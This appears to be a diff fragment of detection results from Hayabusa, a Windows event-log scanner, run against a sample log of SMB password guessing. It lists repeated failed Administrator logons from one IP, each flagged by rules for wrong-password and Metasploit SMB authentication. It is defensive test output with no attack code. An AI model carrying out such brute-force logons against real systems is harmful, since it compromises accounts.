+2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5PXDJPzw0gPdlCiH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mwoe9IgWx2UZ7Iuu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3eW0nFDUwKFzoQIw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q0i0p5QxJ4ykYYJt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VsxqWAnd6j2CdyB3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y5qdy80mtFWl199k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ce0d84uBK4t2sqR3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b4dZYZEW1VijjwHN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZmqGJWbeap5dv0gC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zaNUqChgVSbDkFQu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B4PDZ55it0V4QGnM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TQxXVB8Aj5gaw2f2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vzDeZtgSJoH74GYk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iNAFsZraFvw67WWR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aVdnbyzWqk58rOW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WjUH2PopXCrrPzqi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ylmV2z3WjTWsTpyu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8qBKZTYRTKuEAgS8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JvekO4A5f6QK2ynZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LDUqydSeA1guOjIP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o71TltsJDyOIuLQb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NXT3MSCes42dVCNn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FGXiWeT8Evr6G70M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V2RarzrnGgcLaseH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u3k7dXu9o1vMkhby  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EDBt76dmYnPstFWw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4yjzMC7cw0fe7gjS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eQOWCM7KP68DZTX9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kn9WWWqCIwfrPbie  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AQcamLSzsXOjP6FL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6R6ZMRoYkAPB35Bq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ubqnZm0jmHNFCHrM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7ORQ8vL1oo6CkJXK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rDPl1SSddrWEs979  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VrK7fENAr1lxFr9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wu4djhEVSMYBOmjF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7e0NOdXhEkW6MskA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7nqxLHaOtkHHNAa1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NCrCf73NtEpk5DUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YVFm1epksVGO1nFY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YmVehuMHvh5kVqRW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sERZrNUHsKVEShCb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eaSNgw2hvkxLnQF8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FSYOWptgxHYTDv1x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Van1qwuRoWYPWrIY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TyLCa9OHocazZKQ2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
